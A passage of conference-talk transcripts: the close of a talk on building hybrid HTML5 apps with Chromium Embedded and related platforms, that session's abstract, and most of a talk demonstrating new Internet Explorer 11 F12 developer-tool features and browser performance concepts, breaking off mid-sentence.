And then it's got some very nice features for allowing you to host it in your C sharp app, your WPF app or your Cocoa app or whatever platform it is you're using, and interact with it. So you can still write pretty much all of your app in C sharp and then just write the UI layer in HTML. When I first suggested using this in the office, all of the other devs said no, you should find someone else that uses it, to make sure this is stable and something we want to take a bet on. So I looked around, and it's almost certain that you will have this installed on your machine and not even realize it; or at least I was surprised to find that was the case. The biggest app that I can find that uses it is Spotify. Spotify is a C or C++ app, but the entire UI is built using HTML. On Mac and on Windows they share the same UI: the C++ app boots, gets a web control onto the screen as fast as possible using Chromium Embedded, and then displays these embedded assets. Valve use it on Steam, so if any of you here are gamers, you probably have Steam installed, and a lot of the UI, both the in-game Steam UI and all of the Steam game picker stuff, is HTML5 hosted in CEF. And then one that I find really surprising is Dropbox. Dropbox uses this as well. I don't really think of Dropbox as having much UI; it just sits in my system tray and keeps all my files in sync, but that little system tray control is built using CEF as well. And there's a bunch of others. This thing is getting traction now: Atom, the new editor from GitHub, uses it, and Brackets, the new editor from Adobe, uses it, so it's getting more and more popular. So we built a few prototypes, but one of the problems that we had was that, at Redgate, we build for Visual Studio and SQL Server Management Studio, and people expect fairly deep integration into the IDE, so we wanted to know: could we do that using JavaScript and HTML? So we built SQL Scripts, which is a snippet sharing thing in SSMS, and you can see here it looks quite nice. It allows you, when you're writing some SQL, to select a chunk of it and share it with the community, and it sends it to a big repository that's searchable and everyone can use. The feedback on this has been really good. Now, you might be thinking, and certainly some of the guys in the office did, that this looks quite nice, but I could do this using WPF; it's just a nice theme. So I have one very quick demo that shows some of the advantages of this way of working that may not be obvious at first glance. Here's SQL Server Management Studio, and here's SQL Scripts integrated in the IDE. This is using all the SSMS extensibility APIs, so it's the C sharp language we're familiar with, but it's about to start a Chrome control. If I hold down the Shift key as it starts, then not only does the app start, and hopefully work, but I also get an instance of the Chrome DevTools. And so now I can interact with my app as if it were a web page, which it essentially is. So I can do something like find this All Scripts element and then update it to All Awesome SQL Scripts, and that just updates.
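The kind of thing being typed into the DevTools console there is just ordinary DOM scripting against the embedded page; the selector below is invented rather than the real SQL Scripts markup, but it shows the shape of the trick.

// Typed straight into the Chrome DevTools console attached to the
// embedded control: the change appears inside SSMS immediately, with no
// recompile and no restart.
var heading = document.querySelector('.scripts-header h1'); // hypothetical selector
heading.textContent = 'All awesome SQL scripts';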
So what we found is that the rate of development and the rate of iteration improved, especially when you're working with designers. We have a bunch of designers in the company, and working with them before was painful, because they would come over after you'd written the XAML, look at it and go, no, that's rubbish, that's developer artwork, tell you what to do, and stand over your shoulder as you recompile and restart SSMS. Now they can just do it all themselves: they can come in here, fix it up, you can write that back to disk as HTML, and you just shorten those feedback cycles. Google have noticed this trend, and now have their own platform called Google Chrome Packaged Apps. These are hybrid apps on the desktop. This is a screenshot of Postman, which some of you may have used if you do web dev. It's a really good tool for exploring REST APIs: it allows you to explore web APIs, make JSON calls and see what they look like. This is something that would almost certainly have been a desktop app before, but now it's a Chrome Packaged App, all built using HTML5 and JavaScript and then distributed through the Chrome App Store. So as you can probably tell, I'm a pretty big fan of hybrid apps. I think it's a nice way to build things, and it's got some nice advantages. The most obvious is code sharing, the ability to write code once and have it run across lots of different platforms, which is sort of the dream. In addition, you get transferable skills: when you write on iOS using JavaScript, it's not a big jump to writing on Android or Windows Phone using JavaScript. A subtle one, but important, is the pace of change in web development. The web platform is the biggest platform by far, and the number of companies investing in tooling, debugging, profiling, all of that stuff, is massive and fast moving on the web, and you get to inherit all of that for free across both mobile and desktop. And then one that works for me at least is the idea that you're building future skills. The web has been quite a disruptive technology on the desktop. If you look at things like Google Docs and Office Online, a few years ago they would have definitely been exclusively desktop products, but now the web provides a lot of that, and this is likely to continue, so it's likely that more and more things that were traditionally mobile apps, for performance reasons or for access reasons, will just move to the web. So this is something that you're building now. I did say, though, that it's not perfect; anyone that tells you that this is the only way to do things is almost certainly wrong. The really big one is performance. Every layer of abstraction you add obviously has some performance cost. It depends how important that is to you and what your app's doing, but hybrid apps definitely have a performance cost, especially on older hardware or using the older Cordova style. Modern stuff is not so expensive, but it's still expensive. Look and feel: your app won't look and feel like native controls. There are plugins that will make it easier to build up a native UI using code-behind, a bit like Xamarin.Forms but not quite as good, to build up native tab controls and that kind of stuff, but to be honest you tend to fall into this uncanny valley, where your app almost looks native, but not quite, and then users don't respond well. So the more successful ones have just developed their own style.
If you think about Facebook, it doesn't really look like a native app on any of the platforms, but the experience is still quite nice, and as long as the experience is nice, users don't really mind. And finally, a big disadvantage is that none of this removes the need for testing across what is a pretty fragmented platform, especially on older devices. Android used to ship with a fairly mediocre browser, which gets reused for the Cordova apps, and that browser just didn't do enough to make the apps feel good. So if you have to target older devices, this will be a real pain. On the other hand, if you're lucky enough to be targeting newer devices like Windows Phone 8, then you have IE11 now; on Safari you have really fast JavaScript with iOS 8, and WebGL; and on Android, Chrome now ships as part of the OS, so all of the improvements they make on desktop now come to mobile for free. I'm going to have a couple of final slides on what a potential future may be for app development generally. You're a fool to try and predict anything beyond six months, but they told me not to do that live coding demo and that worked, so I'm going to try anyway. You could imagine some sort of future OS that has an app model that is purely JavaScript and HTML. There have been a few attempts at this; some of them have worked, some of them haven't. WinJS on Windows 8 allows you to write apps for Windows 8 that are entirely HTML and JavaScript based, so built using entirely web technologies, and it hasn't, I would say, been terribly successful. But this one has seen a lot of growth: this is a screenshot of Chrome OS, which is good for a very specific set of needs, which is basically I want a browser on a really cheap device with a really long battery life. And then they also have all of the Chrome Packaged Apps, like Postman which I showed earlier, so now your app can run across Windows and Chrome OS using the same code base. Another really ambitious one is Firefox OS, previously known as Boot to Gecko. The next year will be interesting for this project: it's either going to become very successful in developing countries, or likely fail. But it allows you to use a phone, a very cheap phone, where all of the apps are built using HTML5 and JavaScript, and if you've played with one of these, it's very impressive what they've done. The architecture for both of those, and maybe for every future OS, could be: you have some hardware layer. Here I have just the Linux kernel with some drivers, but you can imagine Windows being there as well. That layer is responsible for doing all of the hardware management, so it interfaces with NFC, it interfaces with the radio and Wi-Fi. On top of that, user land basically becomes a web browser, which wraps up all those native devices and exposes them as, hopefully, web standard APIs. In Chrome OS that's provided by Chromium, and on Firefox OS that's provided by Gecko. That takes all of the native functions and all of the software-level APIs you'd expect, like settings management or contacts management, that kind of stuff, and exposes all of that out as web APIs. It's really interesting the way Firefox OS is developing: if you go to the Mozilla page, there is a list of all the APIs that they think the web needs to really compete on mobile, things like NFC. There's no way to do NFC through a web page yet, but Firefox OS have to come up with something, because they're implementing this.
And so they're implementing something now and then putting it through the standards committee later. And then all of the apps, in the case of Chrome OS, Firefox OS, and maybe in the future lots of other platforms as well, are just built using HTML5. So just in summary, what I want to get across to you is that hybrid apps have matured. They started on mobile, but they aren't just there anymore; they now work across a range of devices. But still, there's this massive caveat that you can't just switch off your brain. They won't be a fit for all projects, but they fit more projects today than they ever have before, and in a year they'll fit even more. So thank you very much for listening. I think we've finished a little bit early, so if you have any questions, I can take them. Otherwise, you can tweet me or grab me afterwards with any questions and I'll come back to you. Thanks. Are there any questions? Cool. Thanks. Thank you. Thank you.
|
Bad news, folks - the number of devices we have to support isn't going to get any smaller. As developers, we now support a plethora of devices and platforms ranging from cheap Android phones through to iPads and even (it's true!) traditional desktop PCs. That would be fine, except we rarely have any extra development time to optimise for them! There is good news, though! Hybrid apps continue to let us target all these form factors with the same core code, and relatively minor additions to create responsive designs. They're not a new concept, but the scope of what is possible has grown significantly. This session will dive into the current state of the art for hybrid, including technologies such as PhoneGap, FireFox OS, Chrome Packaged Apps and node-webkit. By the time you leave, you'll know exactly what you need to build a modern hybrid app which is perfectly suited to your multi-device ecosystem.
|
10.5446/50818 (DOI)
|
Hello, everybody. Hello, that one last guy just coming in. Come in, there's plenty of seats. I'm Martin Beeby. I'm from the UK. Anyone from the UK? Not many. Okay. I'm a developer evangelist in the developer relations team over there, and I'm speaking about the Internet Explorer F12 developer tools. Is everyone okay with that? Is that what you've come for? Good, good. We're going to be talking about the kinds of things which are new in the tools. It's not going to be a 101 of the tools, necessarily; it's going to be showing you the things that are new since the April release, and a few things which I think are really interesting when you're trying to debug and look at performance in your website. So we're going to be looking at a few things around the tools and the things that you can do with them. We'll look at the web runtime architecture, so we can see the places where we may need to optimize our own web applications and the ways we can use those tools to do that. And then we'll look at some real world demos, some real world problems which we will have traced using these tools. I do a lot of debugging. I've been a web developer for over 12 years. This is me when I was 16. I do a lot of debugging. It's only two years ago; I'm actually 18 years old now. And it's really frustrating: debugging is one of the worst parts of web development, in my opinion. And to be honest, the Internet Explorer dev tools have never really been very good, up until there was a marked change in IE9 around the funding and development put into them. They got a little bit better with IE10, and they've got a lot better with IE11, where we're catching up to what our competition are doing in terms of developer tools, but also, in some small areas, actually doing things differently from them and giving you more insight into the dev platform in different ways from our competitors, which is interesting. One of the things that's really quite interesting, or cool, about the new F12 tools is that the release they just shipped, which was in April, was out of band. They did an IE11 release back in November or something like that, and then they shipped the tools again back in April. So they're shipping the dev tools at a much more regular cadence, which is really interesting: they're adding new features out of band of IE11. So the actual dev tools that you will have, if you have IE11 installed on your machine, should have been updated back in April to the version that we're going to be talking about today. All of the updating in IE now happens silently, in the same way that it does with other browsers, so we should be seeing people move more quickly up the chain to the newer browsers. And also, this is quite interesting: it's not just these new tools, but also things like WebGL features, that were dropped in between releases, so it's quite interesting seeing that team working in a more agile kind of way. How many people have not seen the F12 tools before? Have never opened Internet Explorer 11 and seen these tools? One person. If you've ever seen any other browser vendor's tools, these do very similar things. You can select elements, you can look at the CSS, you can choose to manipulate the DOM. There are eight different tools in total. And maybe if I use this, I could probably do this a little bit easier. These tools along the side, does that come out? There are eight tools in total.
We've got DOM explorers, we've got memory profilers, we've got CSS editors. We've got all sorts of different things in the chain of what we're able to do. And I'm going to talk about the things which are new in the developer tools. So first up, one thing to point out is that these tools are in IE11 across Windows 8.1 and across Windows 7 as well. It's not specific to the latest version of Windows; it's also on Windows 7, so any version of Windows with IE11 will be updatable to these tools. So this is the NDC website, and we're going to look at this area where we've got this purple section. I'm going to change that background color by just selecting that element and then changing it to 336699, which is Hotmail blue. Or we can just pick from the color picker and settle on something else; let's click on something like blue violet. So we can change a background property of an element quite simply; you would expect to be able to do that. We can also go over here and select an element to delete it. And you'll notice, as I'm changing these elements, there's a very small color marker to the side of the property which indicates that this has been changed, that there's been some kind of manipulation done on it. We only just added this in the latest version of the tools, and it shows all the changes between versions. We can see here a delta between what I originally had in the CSS and what it is now, as a sort of diff file. We can then just go into that changes tab, cut and paste those CSS changes, and paste them into an editor. I'm just going to paste them into the console here. But you'll see that as you make those manipulations and CSS changes directly inside of the CSS editor, you can then go to the new changes tab, directly cut and paste those changes, and put them back into your editor and back into your website. It was quite hard to do that in the previous tools: you would make these changes, you'd do lots of different manipulations and so forth, and then it was difficult to actually go and get that stuff and put it back into your website. This enables that and makes it slightly easier. Another really simple feature that we've added to the DOM Explorer is the ability to reorder the DOM and manipulate the DOM at will. We can drag elements around the DOM using the DOM Explorer. So if I were to select an element here and bring up the F12 tools, I can take a div, like the bottom section of this website, and I can drag and drop it to different sections. So you can manipulate the DOM, you can edit the DOM, you can add elements, you can delete elements, you can move elements around: all basic, simple stuff. One of the problems that we used to have a lot inside of the IE tools, something which was a constant feature request, was when you are editing CSS elements and they have pseudo states like hover states. It's very, very difficult to work on that CSS, because it's difficult to hover over an element and check its CSS properties at the same time. So what we've done is give you the ability to scroll over, say, on the bottom of the NDC site, these little elements which, as you scroll over them, change: their background color changes slightly.
What you can do is you can select one of those elements and then if you press this little A colon which is just up in the corner here, you can click on that and then you can enable the hover state for that element and when you enable a hover element then the CSS changes because it's had the hover state applied to it. So here we can change that background from 3 through 3 to something like hot pink. Notice again the color just to the left of background has changed as a manipulation which has happened here to our CSS and now that's been applied across the document and we can switch the hover state on and off. It's very useful when you're trying to do CSS debugging specifically when you're dealing with pseudo states like hover and things like followed or visited on Horeff links as well. So that's kind of some of the newer features around the DOM Explorer. So next up is some of the stuff we've done with JavaScript. Now with JavaScript for a long while you've been able to add breakpoints, watches to your JavaScript code. You can debug it, you can go in there, you can have a look at variables, you can expand collections, you can look at objects and so forth. But one of the complications that we have in this modern world is that a lot of the JavaScript we have on our web page is not our own JavaScript. It's actually other people's JavaScript. So we might be using Angular, we might be using jQuery. And when you're trying to debug that stuff it's very, very difficult to figure out what's your code and what's in these libraries. And inevitably the bugs probably exist in your code and not the libraries. So while we're trying to sort of step through this code and breakpoint through this code, what we want to try and do is create a way of just debugging your code rather than debugging jQuery, a minified version of jQuery. So we added this feature called Just My Code which C Sharp developers might recognize from Visual Studio. So the actual team which work on the DevTools in IE now are actually part of the Visual Studio team. They're the same people which build the tools for the Windows 8 JavaScript applications. So if you've seen these tools, the F12 tools, they actually exist directly embedded inside of Visual Studio as well. It's all built by the same team, whereas it used to be built by Internet Explorer. So for example, here we go, we have a, in the inside of the debugger we have a breakpoint and on the NDC website and we put it onto a function called setPopup. And you see as I step through it, I end up in this library, jQuery 1.8.2, an old version of jQuery. And you'll notice as I step through this code, I'm just ending up in this sort of, I'm not in my code anymore, I don't even know where I am, I'm in this sort of world of jQuery, very clever stuff but I've got no idea what it is. So I can press this one which says debug my own code. And then if I play this again, what you'll note is we step through it and we end up back in jQuery again. Because at the moment, they're not using a minified version of jQuery, so the IE's not picking up as different code. So we use this little tool here and say actually this piece of code is actually an external library and then we restart that code again and then this time when we step through and play, we'll refresh the website, what will happen is we will only step through our code and we won't actually end up inside of jQuery. So it's your only stepping through code which is your own code, you're not stepping through other libraries and so forth. 
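To make that concrete, here's a hypothetical sketch of the kind of page code this applies to — the setPopup body and the selectors below are invented for illustration, not the actual NDC site code:

    // My code, calling into library code (jquery-1.8.2.js, marked as a library).
    // With "Just my code" enabled, stepping through a breakpoint in setPopup
    // stays in this function instead of descending into jQuery's internals.
    function setPopup(message) {
      var popup = $("#popup");                   // library call, stepped over
      popup.find(".popup-text").text(message);   // still my line in the debugger
      popup.fadeIn(200);
    }
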
And I mentioned this a moment ago — how do we know which libraries are there? There's some basic sort of pattern matching in there which says if it contains .min, i.e. it's a minified file, then it will automatically be set as not your code. And there's a few other rules as well. But generally you're going to be going in here and you're going to be setting these files — in this instance, this jQuery file — as "it doesn't belong to me" or "it's done by some other developer on my team; I don't need to debug that, I just need to debug my own code". And this is quite useful because not only does it stop you stepping through their code, it also stops any frames from their code appearing in the call stack as well. So their code will just have one single frame rather than all of the different deep calls that it might have in the call stack — it will just have one single frame. Also, first-chance exceptions: for example, in the debugger you can switch on first-chance exceptions to debug things like code which is contained in a try-catch block. You could switch on first-chance exceptions so that it will always break — even though the exception is caught, it will still break, because you want to be debugging something there. But when you have Just My Code enabled, all those exceptions are only going to be thrown if they belong to your code and not if they are in other libraries, because other libraries might be using feature detection to do this sort of stuff as well. So it's not just the stepping through and the debugging, it's also first-chance exceptions and so forth. Another new feature we've added: there's a community project called Source Maps. Google have had this for a little while, and the idea is that in modern web development you're often not writing standard JavaScript or standard CSS anymore. You're often using abstractions like Less, or abstractions like TypeScript or CoffeeScript, to produce your JavaScript. And the problem that arises is you're writing, say, your CoffeeScript file and it has all your clever little properties and methods and so forth in it. But then when it actually goes into production, onto the actual website, and you're using developer tools, you're dealing with the outputted JavaScript of those tools. You're not dealing with CoffeeScript, you're not dealing with TypeScript, you're dealing with the output of those tools. And for a developer who has never seen that output, it can be quite confusing. TypeScript does a lot of things for you which you don't necessarily need to know about as a developer. So when you're trying to debug it, it can become very confusing. So this concept of Source Maps came about — it's not a standard, but it's a community project which was started outside of Internet Explorer. And all it does really is provide a way of saying, between two files, if you're at point X in one file, what's the corresponding point in the other file? So if I'm in a TypeScript file and I'm at line 15, what line is that actually in the JavaScript on the other side? And what that means is that we can then wire up debugging so that you can debug your actual TypeScript rather than the outputted JavaScript. So we'll take a look at that. If we look at the TypeScript website, they actually have a Source Map enabled. And they have a JavaScript file and then they've got a TypeScript file which is linked up to it.
And so if we, if this plays, they have this little thing at the bottom, like a little cloud which is actually done in Babylon.js. Okay. Don't know why that video is not playing. Well, there we go. So we've got a, on the TypeScript website, we've got these clouds which are running and that's actually generated by a TypeScript file. So if you go into the debugger, into the script files here, you'll see that there is a file called cloud.ts, not.js, it's.cloud.ts. So this is the TypeScript file which is used to then go and generate the JavaScript. And you can see you've got all of your TypeScript stuff in there. And we can actually add breakpoints now to TypeScript even though the website's dealing with JavaScript because of this source mapping functionality. So if I add a breakpoint in there, it breaks at that point even though the browser's sort of interpreting JavaScript, we're breaking inside of TypeScript. So we can debug in the code that we wrote rather than the code that was generated by the compiler, by the TypeScript compiler. And we can step through our code just as if we were using debugging JavaScript. And this will work with any kind of source mapped generated files. So TypeScript, when you compile it, there's a flag which you can say to generate a source map. There's lots of different languages, CoffeeScript and TypeScript being some of the most popular, but there's lots of different languages which use this. And the cool thing is when you're in a TypeScript file, you can press this button to switch off the TypeScript and just go back to vanilla JS. So you can sort of compare your original TypeScript to the output of JavaScript to that content. And it's doing this all using source maps. This is a feature which has been in Google Chrome for a little while now. And the same is true, obviously, as well of CoffeeScript. So it's exactly the same principle. We go into the file and rather than the TS file, we have a.coffee script if you're not aware, it's kind of like a Ruby-based syntax for generating JavaScript. And we can put breakpoints in there. And it's going to correspond with actually the breakpoints in real JavaScript. So we can inspect elements and so forth as well. And we can do the same thing about switching between the CoffeeScript and the output of JavaScript as well. So it's really useful if you're a CoffeeScript or TypeScript developer and you want to stay in that world rather than having to deal with the outputted JavaScript. It's really quite powerful. One of the big problems with IE11, the original tools, where you would often get yourself heavily involved in some debugging. And you would have breakpoints set up everywhere. You'd have watches and so forth set up everywhere. And you'd mistakenly close down the browser. And then if you opened it back up, all your watches, all of your breakpoints, had all disappeared. And you had to get yourself back into that position so you can start debugging again. One of the things we've added back in there is this persistence. So not only are we persisting the breakpoints and all of the watches that you might have created when you're debugging from the tools, it will also, all the tabs that you have open, all the documents that you have open in your tools will also start back up exactly where you left off. So if you're doing a lot of a big, huge project, it can be really, really beneficial. I also added a few different ways of navigating using the keyboard inside of the DevTools. So one which I commonly use is Control Shift F. 
And it's kind of "just get me out of here". So you are debugging code and so forth, and you've got in too deep, and you just want to restart the whole thing and restart the whole experience. You just press Control Shift F and it's like a refresh of the browser — it just goes back into the tools from clean. We've always had this feature to navigate between the different tools inside of the DevTools. So there's eight different tools inside of the DevTools, and you could press Control 1 and it would go to the first one; Control 2, it would go to the second one; Control 3, it would go to the debugger. And it's useful because that's actually quite a fiddly menu structure when you're using it with a mouse, specifically when the tool pane is quite small. So it's actually quite useful, if you're using your keyboard, just to press Control 1 to get the DOM Explorer up and so forth. One thing which we added with the new version is Control and the bracket keys. Control open bracket allows you to move up one tool and Control close bracket allows you to move down one. So it's just another way of moving up and down all the different tools there directly from the keyboard, which is quite useful. Whenever I show the DevTools to developers who have been using Chrome DevTools, one of the things they would always complain about was our console.log functionality. If in JavaScript you want to log an object, for example, you would say console.log and, I don't know, console.log window or console.log body. In Chrome, you would get a full object tree of body — whatever you pass in, you would get back as an object. IE previously would convert that into a string literal and you'd just get [object Object]. And it would be kind of useless. So we fixed that. So you can do console.log, throw in any object, and then you can inspect that object at any time. And it's useful, you know, if you've got properties which hang around in the global namespace and you want to inspect them, you can just console.log your object and see it. We went a little bit further than that as well and we've added the ability to log multiple objects. So you can console.log and then send a list of objects. It can be two, it can be three or it can be four. And what's outputted is a sort of array of all of the different objects, so you can inspect them separately. And it's quite useful if you just want a quick look at a lot of objects at once and get them all on screen so that you can inspect them. Also useful for writing messages out to the console is the ability to console.log a format string. If you've ever done string formatting in C sharp, it's kind of a slightly rudimentary way of doing a string.Format, where you go console.log and you pass in a string and you have these %s placeholders. And they relate to the first object and the second object you pass in. What it will do is just toString those objects and put them into the string. So you end up with this: "Oh wow, it's %s and I'm reading %s", and I'm passing in the date and the document title. You end up with those objects all put out in a string: oh wow, it's Thursday, Jan 5th — I did this yesterday — and I'm reading the document title, which is NDC Oslo.
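Roughly, those console calls look like the sketch below (the exact output text will of course vary with your page and the date):

    // Logging live, inspectable objects instead of "[object Object]"
    console.log(document.body);                  // expandable DOM element
    console.log(window, document, new Date());   // several objects in one call

    // printf-style substitution: each %s is replaced by the next argument
    console.log("Oh wow, it's %s and I'm reading %s", new Date(), document.title);
    // -> "Oh wow, it's <current date> and I'm reading <page title>"
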
Useful as well because not only does it give you the string, it also gives you the objects, so you can go into them and check them out as well. You don't just end up with a string, you also end up with the objects. So console.log has been massively improved. There was also a terrible thing that we did in IE 8 and IE 9, which was completely different to other browsers, where if you called console.log from your website and the dev tools were not open, it would throw an error. Did anyone ever get caught by that issue? It's caught me out in production. I put stuff like console.log in my websites all the time and then it would stop working in IE for some reason. It was just because console was always an object in every other vendor's browser, but in ours it wasn't. I think we solved that around IE 9, but what we now do is, if you have this setting set inside your Internet options — "Always record developer console messages" — then even if you haven't got the tools open it's always going to be logging console.log. So if you went to a website and there were a ton of console.logs which happened and then you opened the tools, you'll still see those console.logs appear in your console. You don't have to then go and refresh the page; all that stuff is recorded. (That screenshot is just some old logging, never mind.) We're all using jQuery now, right? Everyone uses jQuery, and it's really dull to write document.getElementById over and over again when you can just use this beautiful little dollar sign everywhere. If you're working on a website which has got jQuery, you can just put the dollar sign inside the console and use the Sizzle selector to your heart's content. But if you don't, all the other browser manufacturers still let you select elements by ID using the dollar sign, and IE never used to. We added it, I think, in IE 11. So you can just say dollar and pass a selector or an element ID and it's going to return the object which it matches. Another one which is quite useful is dollar underscore ($_), which returns whatever the last object was that you evaluated in the console. So in this instance we use dollar dollar ($$) with "h1". And $$ is another little dollar trick which will return an array of all the H1s in the document. So the whole array which is then returned is like this node list here, and it's only actually got one H1 in the whole document. (I'm actually not sure all this circling on screen is even helping — never mind.) And then we can use $_[0]: it takes the last object and indexes into it, the zero index of that last object, and that returns the H1. And then we can say $_.innerHTML. So we can build upon an object again and again by getting the last object that we evaluated in the console. And the reason why we would do this, rather than just writing it all as one line — which would be $$("h1")[0].innerHTML — is that there would be no way for the browser to resolve IntelliSense for the object, because it would have to evaluate all of those selections up front. So by doing it this way, in parts, you're evaluating the objects, gradually building them up, and you can still use IntelliSense on those objects.
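Typed straight into the console, that session looks roughly like this (the selectors are just examples):

    $("header")      // first element matching a selector or ID, like querySelector
    $$("h1")         // array-like list of every matching element
    $$("h1")[0]      // the first h1 on the page
    $_               // the result of the last expression you evaluated
    $_.innerHTML     // keep building on it, with IntelliSense at each step
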
So $_, $$ and the $ selection have all been added into the IE tools to kind of bring us up to par with what other developer tools are doing, and it makes it very easy to select elements and objects from Internet Explorer. But developer tools are not just about debugging your application. In fact, that's the thing that most people will use DevTools for, right? Like, the reason why you would pick up the IE DevTools would probably be because someone's reported a bug in IE and it's not happening in other browsers, so their DevTools are useless because it's only happening in IE. However, there are a number of features that have been added to our DevTools which actually aren't really about debugging necessarily, but can actually help you improve the performance of your web page. And performance really matters nowadays because we're building websites not just for desktops and for powerful Intel slates and computers and laptops. We're actually building them for mobile phone devices which have very restricted hardware. And so it's important to think about things like network, memory and power consumption of your code so that you can deliver an experience which is really good for your users. When you think about network, we have a networking tool and it shows us all of the networking things that happen. It shows you all of the requests that are made and you can see how long the requests take, and that's a very useful tool — you might have seen that in Chrome. And you can see that in IE as well, and it's in Firefox and all the major tools. And that's really useful because it helps us understand how much is actually getting passed through the pipes and what's getting passed through the pipes. It can also help us understand latency as well. How far are things going? Are we having to go to America to go and pick up that image? Are we going to China to pick up that JavaScript file? Understanding those things and doing a network trace is really useful for solving some of these problems and figuring out why a website is not performing well. It might be down to some kind of network problem. If we look at the performance of a website, we can actually do an awful lot to improve the perceived performance just by understanding our website, understanding how it works, and getting content on the screen for the user very, very quickly. So, for example, a web page might take 1.81 seconds to load in its entirety, to the point where the browser considers it completely loaded. But on this particular page, the actual time to glass — the time at which we actually put something on the screen — is 0.65 seconds. And that's really the thing that counts, because that's the perceived performance of that website. And a lot of these developer tools inside of Internet Explorer now are helping you to discover how you can get this perceived performance improved — not just overall page load times, but actually how we can make it feel faster as well. We'll see on this trace in particular that there's CPU time of 1.39 seconds. That means there's idle CPU time of 0.42 seconds. If we understood how our website is working, and why and how we're using the CPU, we could improve this even further and reduce the overall load time of this web page by having better CPU utilization.
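If you want rough numbers like these from script rather than from the tools, one option — a sketch assuming the Navigation Timing API, which IE has supported since IE9 — is something like the following. Note that "time to glass" isn't exposed directly, so these are only approximations:

    window.addEventListener("load", function () {
      // wait one tick so loadEventEnd has been filled in
      setTimeout(function () {
        var t = performance.timing;
        console.log("first byte:   %s ms", t.responseStart - t.navigationStart);
        console.log("DOM ready:    %s ms", t.domContentLoadedEventEnd - t.navigationStart);
        console.log("fully loaded: %s ms", t.loadEventEnd - t.navigationStart);
      }, 0);
    });
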
One of the biggest problems which happen with specifically single page applications is memory utilization. And one of the biggest problems that we face with memory utilization is images. It seems ridiculous. It's not problems of creating too many objects on the window. It's just using far too many images because every image is decoded and then put onto the stack, on the memory stack. And this is a hockey stick graph of 5,000 websites and we traced each of those memory, the memory footprint of each of the top 5,000 websites. And what you'll notice is that most are kind of under a 20 meg, most websites. And then you've got this small selection of websites which go up to all the way to like 180, 200 megabytes of image memory just to load on a single web page, on a single page. And this happens quite a lot. This is one of the biggest problems when people come to us with performance problems with their websites. It's often just misuse of images and overuse of images. So understanding memory and how you're using your memory in your application is really important as well. And the other thing is power consumption. Obviously people are using mobile devices and they are less likely to use applications which drain their battery. And it's probably easier than you think to drain someone's battery. Say for example you're writing a HTML5 application for this phone and it was like a GPS sat nav kind of application. Okay, so if you're a sat nav you're going to need to go to the GPS so you're going to have to enable the antenna. So that's probably going to be using like 2 watts of electricity or something like that. And then you're going to be taking some images, some map tiles and you're going to be loading them on the GPU and you're going to be loading them on the website. So you're going to be using the GPU, that's going to be an extra watts or 3 watts. And then maybe because there's quite a lot of computation which is going on you're going to be using an extra core in that device as well. That could be an extra couple of watts as well. Soon you're up to like 5 watts of electricity, the maximum that a phone can use. And all of a sudden your phone starts getting really hot because you're using all of the features of this phone. It's very easy in a single page application to start using loads and loads of features. You're starting using the antenna, you're starting using the GPU, you're starting using multi-cores. All of a sudden the phone's getting really, really hot. And it's getting really hot and the battery is draining. So what the most users do, well they take their phone and they plug it in. Because it's a sat nav they'll probably be able to plug it into their car and it's fine. But it's not fine because the phone is getting really hot. It sort of enables thermal mitigation and it says I'm too hot, I'm too hot to charge. So it stops charging because it's a way of reducing the heat on the phone. It's still running your application, it's still draining the application. And you end up in a situation where the phone just dies because you were trying to do some very complicated stuff continuously using a very low powered device. And that device will eventually run out of battery because it's trying to keep itself cool. And it won't charge when it's trying to keep itself cool. So understanding how you're using or how many of the subsystems you're using and what you're doing with your web application is really important. Not just for memory, not just for speed, but also for power consumption as well. 
And really, performance in a website isn't just about being fast, it's also about being efficient. Let's look at the way the web works, or the way a browser works and what it does. So we start off and make a request for a web page: there's networking, DNS lookups, all that sort of thing. We actually go and get the files, all the different references. I think there's something like 94 requests in an average page load. Of those 94 requests, for the same DNS name, the same domain name, we can only service six at a time. So if they all came off the same domain, we'd do them in batches of six and they would block and block and block. So spreading across different DNS names and so forth is potentially a way of improving the network performance. But then the more different domains you have, the more DNS lookups you have. And so networking isn't as simple as just using a CDN; it can be more complicated than that, and it's different for each website. Then we take all of those files and we parse them. So all your HTML, your CSS files and so forth — we parse all of those things, and from the HTML we create a DOM tree, a list of all the objects in the DOM. It has no recollection of the styles which are going to be applied at this point; it's just objects in a tree. We take the CSS cascade, which is all of the styles and so forth, and we interpret JavaScript. It's important here that we have to interpret all of the JavaScript which is loaded into the page before we can move on to the next point, because it could affect the DOM tree. JavaScript runs in a sandbox, but there are DOM APIs which reach out of that sandbox and affect things in the document. And then once we've got all of this — we've got the DOM tree, we've got the CSS — we can start formatting, applying those styles to the DOM elements. And then we know where things should be, so we can start laying things out. And we lay them out as rectangles on the screen. And then once we've laid everything out, we know where everything should be, we know what colors it should be, and it goes into a thing called a display tree. And IE is then ready to paint — to paint what it has in its display tree to the GPU, to the computer. And I say ready to paint because IE doesn't decide when it paints; the monitor decides when it paints, because it has a refresh rate of, say, 60 hertz — it can repaint, say, every 16 milliseconds. So there's a hardware interrupt which goes back to IE through Windows and says, I'm ready to paint. Have you got a new display tree for me? And IE says, yes, I've got a new display tree, here you go. So it's quite important to correlate display trees with paints, because if we're doing all this work of calculating the display tree and not painting it, that's all just wasted CPU cycles. And then we actually go and paint that display tree when we get this hardware sync — v-sync, we call them. When we get that, we can then paint it to the screen. And we composite all that information, and we do lots of fancy tricks in IE. We do a lot more compositing in DirectX than, I think, practically anyone else. We're basically painting surfaces using DirectX — everything from text to SVGs, even JPEGs now, we're using DirectX to paint those things.
And then we, and then someone can actually go and edit that document or they could change it by manipulating the screen and so forth or changing, and then we have to go through this whole cycle again and again and again and again. And obviously this iterates and iterates and iterates and iterates and iterates and iterates. New DOM trees, new display trees, all of the time being created as things are changed and things are manipulated. Every time you manipulate, we have to create a new DOM tree because something has changed. And it's important to make sure that you don't create ones which are pointless because that's all just wasted CPU cycles. So if I go to something like, this is quite an interesting point where we paint these GPU surfaces, we paint these surfaces and then someone might use a touch device and they might pinch zoom. And what we do in Internet Explorer is we do, you can actually see how we're interacting directly with the bitmap on the GPU so this doesn't actually go back to the browser at all. So if I zoom in, you'll know that the arrow function, that text is really jaggy. As soon as I let go, it goes back to the display and it repaints the whole screen. But actually when I'm manipulating the screen there, I'm actually manipulating directly on the GPU. It's not going back to Internet Explorer to do any of that manipulation. It's only when I let go of the screen. And we do quite a lot of things like that which try and prove the overall performance by leveraging the GPU rather than having to do full repaints. And it means that when you're doing things like to semantically zoom or moving and zooming certain the site, you're not blocking the UI thread from doing other things. Okay, so how do we get intimate insight into what actually is happening here? That whole tree, how do we figure out what's going on there? Well, there's a thing called the event tracing for Windows and it logs events, it gives insights to the platform and it traces 